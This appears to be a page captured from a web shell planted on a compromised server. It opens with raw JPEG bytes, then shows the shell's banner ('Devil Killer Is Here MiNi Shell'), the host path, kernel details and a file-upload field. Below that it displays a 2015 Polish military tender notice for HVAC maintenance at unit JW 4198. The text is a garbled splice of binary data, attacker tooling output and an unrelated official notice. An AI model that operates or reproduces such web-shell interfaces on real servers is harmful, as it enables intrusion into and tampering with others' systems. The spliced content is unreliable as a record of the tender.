JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150528/77773-N-2015.html

<p class="kh_header"><b>Warszawa: Wykonanie usługi konserwacji i naprawy urządzeń klimatyzacyjnych i wentylacyjnych w kompleksach wojskowych administrowanych przez  JW. 4198</b><br>
<b>Numer ogłoszenia: 77773 - 2015; data zamieszczenia: 28.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1bltr.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi konserwacji i naprawy urządzeń klimatyzacyjnych i wentylacyjnych w kompleksach wojskowych administrowanych przez  JW. 4198.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest- Wykonanie usługi konserwacji i naprawy urządzeń klimatyzacyjnych i wentylacyjnych w kompleksach wojskowych administrowanych przez  JW. 4198 - określone poniżej
Przedmiotem zamówienia jest usługa polegająca na świadczeniu kompleksowej usługi konserwacyjnej polegającej na przeprowadzaniu prac konserwacyjnych  i napraw urządzeń technicznych klimatyzacyjnych i wentylacyjnych, która ma gwarantować niezawodną pracę tych urządzeń  oraz wykonywanie serwisowych prac z zakresu konserwacji i napraw tych urządzeń w kompleksach wojskowych administrowanych przez Jednostkę Wojskową Nr 4198 w kompleksie K - 0030,    K - 0192, K - 6077 przez okres 12 miesięcy.
Zakres prac do wykonania 
Centrale wentylacyjno - klimatyzacyjne-
- Utrzymanie urządzeń w czystości.
- Kontrola filtrów - wymiana średnio 2 razy w roku -robocizna w ramach umowy; zapłata za materiały nastąpi po przedstawieniu faktury z zakupu-. Podczas wymiany należy zamontować filtry o identycznej klasie filtracji oraz wyczyścić sekcję filtracji poprzez odkurzenie lub wytarcie na mokro,
- Kontrola spręży wentylatorów,
- Sprawdzenie działania automatyki zgodnie z założeniami oraz dokumentacjami techniczno - ruchowymi poszczególnych urządzeń,
- Regulacja mocy nagrzewnicy,
- Sprawdzenie nastaw temperatury,
- Sprawdzenie stanu technicznego wymiennika krzyżowego ciepła i stopnia zabrudzenia płyt aluminiowych i w razie potrzeby czyszczenie,
- Sprawdzenie poprawności zadziałania zabezpieczenia przed wzrostem temperatury,
- Regulacja wydajności chłodnicy,
- Kontrola stanu zabrudzenia i ciężkiej pracy oraz funkcjonowanie przepustnicy 
z ewentualnym czyszczeniem, 
- Sprawdzenie stanu zabrudzenia wkładów tłumienia z czyszczeniem w razie potrzeby,
- Sprawdzenie połączeń elektrycznych, stanu technicznego elementów grzejnych, czy nie są zdeformowane oraz stopień ich zabrudzenia z czyszczeniem w razie potrzeby, 
- Sprawdzenie stanu zabrudzenia chłodnicy z czyszczeniem w razie potrzeby,
- Sprawdzenie czystości odkraplacza oraz drożność odpływu z tacy na skropliny 
i drożność syfonu wodnego - z czyszczeniem w razie potrzeby, 
- Sprawdzenie zawartości i gęstości glikolu w obiegu - w razie potrzeby wymiana,
- W wentylatorze sprawdzić czy: wirnik łatwo się obraca, jest wyważony i czy nie wykazuje -bicia- czy wirnik jest dobrze zamocowany na osi, nie przesunął się w stosunku do leja wlotowego, wibroizolatory czy są dokładnie zamocowane i nie są uszkodzone, połączenie elastyczne -jeżeli występuje- nie jest uszkodzone, czy wszystkie śruby mocujące elementy konstrukcyjne zespołu wentylatorowego są dokręcone, 
- Kontrola stanu zabrudzenia obudowy wirnika i silnika - w razie potrzeby czyszczenie,
- Sprawdzenie stanu technicznego łożysk łącznie z kontrolą temperatury oraz czyszczeniem w razie potrzeby i smarowaniem,
- Po przeprowadzonych czynnościach kontrolnych i konserwacyjnych należy sprawdzić obroty wentylatora - kierunek obrotów musi być kontrolowany,
- W przypadku czynności obsługowych silnika wentylatora należy sprawdzić czy określone dane techniczne są spełnione -pobór mocy, temperatura uzwojeń, łożysk-, nie występują przecieki smaru, silnik działa prawidłowo i nie nasilają się szumy pochodzące od silnika i łożysk,
- Sprawdzenie prawidłowość zamocowania wszelkich połączeń elektrycznych 
i mechanicznych, oraz czy przewody i izolacje są w dobrym stanie i czy nie występują ich przebarwienia, wszystkie nieprawidłowości należy natychmiast usunąć,
- Sprawdzenie naciągu pasów napędowych, ich stanu technicznego w centralach -czy nie jest przetarty, pęknięty, przesuszony lub uszkodzony-, oraz równoległość ułożenia kół pasowych, wymiana w razie potrzeby. Po założeniu nowych pasów należy przeprowadzić kontrolę ustawienia kół, 
- Pomiar napięcia i poboru prądu silników wentylatorów,
- Sprawdzenie układu odzysku,
- Pomiar napięcia i poboru prądu silników pomp obiegowych,
- Sprawdzenie czystości lamel wymiennika - w razie potrzeby czyszczenie,
- Sprawdzenie czystości i ewentualne czyszczenie kół zębatych i łopat przepustnicy,
- Sprawdzenie połączeń elastycznych gwintowanych,
- Kontrola i smarowanie wentylatorów,
- Zabezpieczenie powierzchni przewodów przed korozją,
Agregaty wody lodowej-
-  kontrola poziomu oleju w sprężarce,
-  kontrola przegrzania,
-  kontrola napełnienia obiegu wodnego,
-  kontrola ilości czynnika chłodniczego,
-  kontrola działania grzałki karteru,
-  kontrola napięcia zasilającego,
-  mocowania połączeń elektrycznych,
-  kontrola działania zaworu elektromagnetycznego,
-  kontrola kalibracji czujników temperatury,
-  kontrola kalibracji czujników ciśnienia,
-  kontrola kalibracji i działania urządzeń zabezpieczających,
-  kontrola stanu styków zdalnego sterowania,
-  kontrola działania grzałki parownika,
-  kontrola stanu przewodów odprowadzających,
-  kontrola powierzchni wężownicy, wentylatorów i filtrów, czyszczenie,
-  kontrola pasów napędowych,
-  kontrola kwasowości i czystości oleju, w razie potrzeby wymiana oleju sprężarki, lecz nie rzadziej niż co 5 000 godz. pracy,
-  kontrola stanu zaworów bezpieczeństwa i drożności ich odpływów,
- kontrola korozji obiegu chłodniczego, szczególnie w odniesieniu do zbiorników ciśnieniowych, w razie potrzeby zastosowanie środków ochrony powierzchni, 
-  kontrola wycieków czynnika chłodniczego, a w przypadku ich wykrycia jak najszybsza likwidacja,
-  sprawdzanie działania układów centrali współpracujących z systemem BMS
Urządzenia klimatyzacyjne typu Split -
- przegląd obudowy zewnętrznej urządzenia,
- przegląd połączeń elektrycznych, automatyki, czujników, itp.
- sprawdzenie szczelności układu chłodniczego a w przypadku konieczności uzupełnienie czynnika chłodzącego,
- oczyszczenie skraplaczy i parowników,
- sprawdzenie układu odprowadzenia kondensatu,
- sprawdzenie izolacji termicznej instalacji freonowej, w razie potrzeby uzupełnienie,
- wykonanie drobnych napraw zapewniających poprawną  pracę urządzeń,
Klimatyzatory przenośne
- sprawdzenie zabrudzenia i oczyszczenie filtra powietrza, skraplacza i parownika,
- sprawdzenie szczelności układu chłodniczego a w przypadku konieczności  
   uzupełnienie czynnika chłodzącego,
- sprawdzenie zbiornika skroplin,
- sprawdzenie prawidłowości podłączenia i szczelności elastycznego rurociągu 
   powietrza,
- sprawdzenie działania sterownika urządzenia, połączeń elektrycznych, automatyki, 
   czujników, itp.
- wykonanie drobnych napraw zapewniających poprawną  pracę urządzeń,
Nawilżacze powietrza
- sprawdzenie wycieków z urządzenia
- sprawdzenie  instalacji wodnej; elastycznego węża zasilającego, zaworu spustowego i zaworu bezpieczeństwa,
- sprawdzenie instalacji parowej; węży elastycznych i opasek zaciskowych na wężach,
- sprawdzenie odprowadzenia skroplin kondensatu,
- usuniecie osadów mineralnych -w cylindrach rozbieralnych-, sitek i filtrów,
- sprawdzenie długości elektrody magnezowej,
- sprawdzenie działania sterownika urządzenia, połączeń elektrycznych, automatyki, czujników, itp.
-  sprawdzanie działania układów współpracujących z systemem BMS
- wykonanie drobnych napraw zapewniających poprawną pracę urządzeń,
Klimakonwektory sufitowe
- sprawdzenie wycieków z urządzenia,
- sprawdzenie działania sterownika ściennego,
- sprawdzenie prawidłowości działania zaworów odcinających,
- sprawdzenie działania zaworów trójdrogowych,
- czyszczenie filtra powietrza,
Po przeprowadzonych przeglądach i zabiegach konserwacyjnych, należy przeprowadzić kontrolę i regulacje parametrów pracy urządzenia.
1.Powyższy opis zakresu robót zawiera jedynie opis podstawowych czynności serwisowych i konserwacyjnych wybranych podstawowych urządzeń technicznych występujących w różnego rodzaju centralach. Istniejące w obiektach, zestawione w niezmiennych konfiguracjach, posiadające stały skład urządzenia techniczne central eksploatowane są zgodnie z przeznaczeniem, posiadają dokumentację techniczną i inne dołączone do central dokumenty co stanowi wystarczające, niezbędne wskazówki dla wykwalifikowanego personelu.
2.Szczegółowy wykaz urządzeń klimatyzacyjnych i wentylacyjnych wraz    z wyszczególnieniem ich lokalizacji i częstotliwością przeglądów zawiera załącznik nr 2 do umowy.
3.Wykonawca zobowiązany jest do zapoznania się z dokumentacją powykonawczą dot. systemów wentylacji i klimatyzacji celem zdobycia wszelkich informacji, które mogą być konieczne do wykonywania przeglądów.
4. Wykonawca jest zobowiązany do końca 2015 r. - na podstawie art.62. pkt. 1 ustawy Prawo Budowlane- do przeprowadzenia oceny efektywności energetycznej urządzeń o mocy chłodniczej nominalnej większej niż 12 kW zawartych w załączniku nr 2  do Umowy.
5. Wykonawca przed podpisaniem umowy przedstawi certyfikaty autoryzowanego instalatora i serwisanta firm urządzeń zawartych w zestawieniu nr 2.
6.W przypadku konserwacji urządzeń w budynku nr 20 w KW - 0030 oraz zewnętrznych współpracujących z budynkiem Wykonawca wystąpi do Dowódcy JW 4191 o zgodę na dostęp do pomieszczeń  na poziomie minus I i minus II w celu realizacji umowy, uzgadniając przy tym dokładnie terminy realizacji przedsięwzięcia pasujące obu stronom i mieszczące się w terminie zawartym      w umowie. 
7.	Zamawiający wymaga od Wykonawcy okazania świadectwa bezpieczeństwa przemysłowego co najmniej trzeciego stopnia potwierdzającego zdolność do ochrony informacji niejawnych o klauzuli TAJNE. 
8.Pracownicy Wykonawcy realizujący przeglądy konserwacyjne i naprawy w I strefie bezpieczeństwa muszą posiadać poświadczenie bezpieczeństwa osobowego oznaczone klauzulą TAJNE. Konieczne jest załączenie listy i kserokopii poświadczeń bezpieczeństwa osobowego pracowników uczestniczących w przeglądzie oraz kserokopii świadectwa bezpieczeństwa przemysłowego. 
9.Ponadto Wykonawca zobowiązany jest do
a)Sporządzania stosownego protokołu z przeglądów urządzeń wentylacji i klimatyzacji wskazując przy tym ewentualne usterki, które należy niezwłocznie usunąć lub kwalifikujące urządzenie do remontu.
b)Realizacji niniejszego zamówienia zgodnie z obowiązującymi przepisami BHP i ppoż.
c)Realizacji przeglądu konserwacyjnego w czasie dni roboczych podczas obowiązujących godzin pracy tzn. 800 - 1500, natomiast usuwanie usterek niezwłocznie po zgłoszeniu telefonicznym, w czasie nie dłuższym niż 6 godzin w przypadku gdy usunięcie usterki nie wymaga wymiany elementów niezbędnych do sprowadzenia od dystrybutorów lub producentów.
d)do usunięcia na własny koszt wad powstałych w wyniku źle wykonanej usługi.
Przed złożeniem oferty wskazana jest wizja lokalna na miejscu.
Szczegółowy Opis przedmiotu zamówienia, Wykaz urządzeń do wentylacji i klmatyzacji oraz SIWZ, znajduje się na stronie internetowej Zamawiającego www.1bltr.wp.mil.pl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia wraz z ofertą:
1. Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust 1  ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych -Dz. U. z 2010r. nr 113 poz. 759 z późn. zm. - załącznik nr 4 do SIWZ.
2. Oświadczenie o braku podstaw do wykluczenia - załącznik nr 5 do SIWZ. 
3. Oświadczenie Wykonawcy o przynależności do grupy kapitałowej (art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych) - załącznik    nr 6  do SIWZ.
4. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji  o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym  w art. 24 ust. 1 pkt. 4-8 ustawy, wystawioną nie wcześniej niż    6 miesięcy przed upływem terminu składania ofert.
8. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert. 
9. Wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonywania  i podmiotów, na rzecz których dostawy lub usługi zostały  oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie -poświadczenia - referencje-. Zamawiający wymaga co najmniej dwóch dowodów wykonania przedmiotu zamówienia zgodnych z powyższym zakresem. Zgodnie  z załącznikiem nr 7  do SIWZ
10. Świadectwo Bezpieczeństwa Przemysłowego co najmniej III stopnia, zgodnie z ustawą z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych -Dz. U. z 2010 r., nr 182, poz. 1228- oraz Instrukcją Bezpieczeństwa Przemysłowego, stanowiącej załącznik nr 9  do SIWZ
11. Wykaz osób przewidzianych do realizacji zamówienia -Zgodnie  z załącznikiem nr 8  do SIWZ
12. Oświadczenie Wykonawcy o przeprowadzonej wizji lokalnej w miejscu planowanych robót i zapoznaniu się z warunkami w jakich przeprowadzone będą prace.
13. Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
